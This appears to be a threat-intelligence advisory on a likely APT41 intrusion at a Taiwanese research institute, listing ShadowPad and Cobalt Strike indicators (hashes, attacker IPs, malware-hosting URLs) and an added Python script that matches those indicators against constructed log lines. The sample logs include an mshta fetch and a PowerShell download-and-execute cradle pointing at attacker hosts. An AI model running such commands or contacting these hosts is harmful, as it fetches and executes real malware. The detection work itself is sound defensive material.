Likely compromise of Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

Aug. 2, 2024, 8:31 a.m.

Description

A government-affiliated Taiwanese research institute specializing in computing technologies experienced a cyber intrusion likely carried out by the Chinese hacking group APT41. The attackers deployed the ShadowPad malware, Cobalt Strike and custom tools, and exploited CVE-2018-0824 (using the public UnmarshalPwn tool listed below) for privilege escalation. They gathered information about the environment, deployed backdoors, harvested credentials and exfiltrated data. Evidence suggests the operators were Chinese speakers who followed publicly available anti-detection guidance.

Date

  • Created: Aug. 2, 2024, 8:23 a.m.
  • Published: Aug. 2, 2024, 8:23 a.m.
  • Modified: Aug. 2, 2024, 8:31 a.m.

Indicators

  • eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28
  • 2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
  • 58.64.204.145
  • 45.85.76.18
  • 103.96.131.84
  • 103.56.114.69
  • www.nss.com.tw
  • https://www.nss.com.tw/calc.exe
  • http://www.nss.com.tw/p.ps1
  • http://www.nss.com.tw/1.hta
  • http://45.85.76.18:443/yPc1
  • http://103.56.114.69:8085/p.ps1
  • w2.chatgptsfit.com
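
The indicators above mix three kinds of atomic values (SHA-256 hashes, IPv4 addresses, hostnames) with full URLs, and feed exports of lists like this one often carry defanging (`[.]`, `hxxp`) or stray quote characters that make naive string matching miss. The script below is an added example, not code from the original advisory or from any vendor: it normalises the indicator values listed above, buckets them by kind (a URL indicator also contributes its host, so a bare DNS query or TCP connection to that host is still caught) and scans a handful of constructed log lines for matches. The `SAMPLE_LOGS` lines are invented for illustration and are not telemetry from the incident; the function and variable names are this example's own.

```python
"""IOC matcher for the indicators listed in this advisory (added example,
not original advisory or vendor code). Indicator values are copied from the
list above; the sample log lines are constructed for illustration."""
import re
from urllib.parse import urlsplit

# Indicators from the list above. Three URLs keep the stray trailing quote that
# indicator exports sometimes carry; normalise() strips it, whereas a naive
# exact-match scanner would silently miss them.
RAW_INDICATORS = [
    "eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28",
    "2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9",
    "58.64.204.145",
    "45.85.76.18",
    "103.96.131.84",
    "103.56.114.69",
    "www.nss.com.tw",
    "https://www.nss.com.tw/calc.exe'",
    "http://www.nss.com.tw/p.ps1'",
    "http://www.nss.com.tw/1.hta",
    "http://45.85.76.18:443/yPc1",
    "http://103.56.114.69:8085/p.ps1'",
    "w2.chatgptsfit.com",
]

# Constructed sample telemetry, not real logs: HTA fetch, defanged DNS query,
# PowerShell download cradle, C2 connection, dropped file, and a benign line.
SAMPLE_LOGS = [
    '2024-07-15T02:11:09Z host=ws-17 proc=mshta.exe cmd="mshta http://www.nss.com.tw/1.hta"',
    "2024-07-15T02:11:12Z host=ws-17 dns query=w2[.]chatgptsfit[.]com type=A",
    "2024-07-15T02:12:40Z host=ws-17 proc=powershell.exe cmd=\"IEX (New-Object Net.WebClient).DownloadString('http://103.56.114.69:8085/p.ps1')\"",
    "2024-07-15T02:13:01Z host=ws-17 netconn dst=45.85.76.18 dport=443 proto=tcp",
    "2024-07-15T02:13:05Z host=ws-17 file_write path=C:\\Users\\Public\\calc.exe sha256=eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28",
    "2024-07-15T02:14:00Z host=ws-22 netconn dst=8.8.8.8 dport=53 proto=udp",
]

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")
# Token extractors for free-form log text, keyed by IOC kind.
FINDERS = [
    ("sha256", re.compile(r"\b[0-9a-f]{64}\b")),
    ("url", re.compile(r"https?://[^\s'\")]+")),
    ("ipv4", re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    ("domain", re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")),
]


def normalise(value):
    """Lower-case, strip wrapping quotes and undo [.] / hxxp defanging.
    Lower-casing makes URL paths match case-insensitively: a deliberate trade
    of a little precision for not missing a re-cased download path."""
    v = value.strip().strip("'\"").lower().replace("[.]", ".").replace("[:]", ":")
    return "http" + v[4:] if v.startswith("hxxp") else v


def classify(value):
    """Return (kind, normalised value); kind is sha256/url/ipv4/domain/unknown."""
    v = normalise(value)
    if SHA256_RE.match(v):
        return "sha256", v
    if "://" in v:
        return "url", v
    if IPV4_RE.match(v):
        return "ipv4", v
    if HOST_RE.match(v):
        return "domain", v
    return "unknown", v


def build_ioc_set(raw_indicators):
    """Bucket indicators by kind. A URL also contributes its host, so a bare
    DNS query or TCP connection to that host is flagged too."""
    iocs = {"sha256": set(), "url": set(), "ipv4": set(), "domain": set()}
    for raw in raw_indicators:
        kind, v = classify(raw)
        if kind == "unknown":
            continue
        iocs[kind].add(v)
        if kind == "url" and urlsplit(v).hostname:
            hkind, host = classify(urlsplit(v).hostname)
            if hkind in ("ipv4", "domain"):
                iocs[hkind].add(host)
    return iocs


def scan_line(line, iocs):
    """Return sorted (kind, value) hits for one log line, after refanging it."""
    text = normalise(line)
    return sorted({(kind, tok) for kind, rx in FINDERS
                   for tok in rx.findall(text) if tok in iocs[kind]})


def scan_logs(lines, iocs):
    """Return [(line_index, hits)] for every line with at least one hit."""
    return [(i, h) for i, line in enumerate(lines) if (h := scan_line(line, iocs))]


if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS, build_ioc_set(RAW_INDICATORS)):
        print(f"line {idx}: {hits}")
```

Run as-is it reports hits on the first five constructed lines and none on the benign DNS line. Two design points matter in practice: the hostname of every URL indicator is promoted to its own IOC, because the stager that fetched `p.ps1` will often show up in DNS or NetFlow rather than in a proxy log with the full path; and the whole line is refanged before scanning, because analysts' notes and some SIEM exports store `w2[.]chatgptsfit[.]com` rather than the live domain.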

Attack Patterns

  • UnmarshalPwn
  • POISONPLUG.SHADOW
  • ShadowPad - S0596
  • Cobalt Strike - S0154
  • APT41

Additional Information

  • Taiwan

Linked vulnerabilities

  • CVE-2018-0824